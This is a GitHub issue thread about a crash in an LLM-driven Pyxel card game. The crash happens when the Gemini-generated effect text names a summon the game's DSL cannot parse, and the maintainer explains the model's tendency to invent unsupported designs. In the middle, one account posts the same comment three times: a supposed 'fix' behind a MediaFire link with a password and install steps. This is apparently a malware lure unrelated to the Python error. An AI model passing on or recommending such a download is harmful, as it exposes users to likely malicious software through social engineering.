### ISSUE TITLE
Some issues

### ISSUE THREAD

**Issue by bitcoin4cashqc** [RuneBlaze/pineapple-pen#1]
I saw your video on youtube. Years ago I made an ethereum decentralized tamagotchi with pyxel.

I ran your code using windows 10 (sadly) on wsl.

I faced that issue : 
```024-08-30 18:32:00 [info     ] JsonParser: 
{
"reason": "The Spire Guardian A summons two Saplings, each dealing 1 damage to the player each turn.",
"results": "[Spire Guardian A: summoned <Sapling: deal 1 damage to player each turn> * 2]\n[Player: damaged 1]\n[Player: damaged 1]",
"significance": 1
}

2024-08-30 18:32:00 [info     ] EventBus.emit                  listener=<weakref at 0x7f4994137990; to 'AppWithScenes' at 0x7f4a28ee4970> unwrapped=<bound method AppWithScenes.on_event of <genio.scene.AppWithScenes object at 0x7f4a28ee4970>>
2024-08-30 18:32:00 [info     ] AppWithScenes.on_event         ev=LLMInboundEv()
Traceback (most recent call last):
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/scene.py", line 166, in update
    self.scenes[0].update()
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/scene.py", line 56, in update
    self.current_version.update()
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/gui.py", line 1277, in update
    self.check_mailbox()
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/gui.py", line 1330, in check_mailbox
    effects = self.futures.popleft().result()
  File "/home/btc4cash/.pyenv/versions/3.10.12/lib/python3.10/concurrent/futures/_base.py", line 451, in result
    return self.__get_result()
  File "/home/btc4cash/.pyenv/versions/3.10.12/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
    raise self._exception
  File "/home/btc4cash/.pyenv/versions/3.10.12/lib/python3.10/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/battle.py", line 953, in resolve_enemy_actions
    self.process_effects(resolved_results.results)
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/battle.py", line 866, in process_effects
    battler = self.search(target)
  File "/mnt/c/Users/User/Desktop/pineapple-pen/src/genio/battle.py", line 846, in search
    raise ValueError(f"No battler found with name '{name}'")
ValueError: No battler found with name 'spire guardian a: summoned <sapling'
```

We should talk, this idea is genius and the graphics are awesome. bitcoin4cashqc@hotmail.com

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by RuneBlaze** [comment]
Unfortunately summoning saplings (or summoning anything) was too buggy to be included in this version of the DSL that is written by Gemini 🙃 (should not be hard to add -- but the model sometimes hallucinates designs that are not yet in the DSL no matter how powerful the DSL is). The reliability and controllability of LLMs is something that was hard to conquer in this iteration of the game. We cannot always trust using the model to generate complex behavior -- I guess at least I could have made it more fault tolerant.

Thanks for the interest -- let me send you an email to in general follow up.

**Comment by bitcoin4cashqc** [comment]
[Gladly](https://youtu.be/Ct6BUPvE2sM?si=og6UKsLPmijiGrwburl)
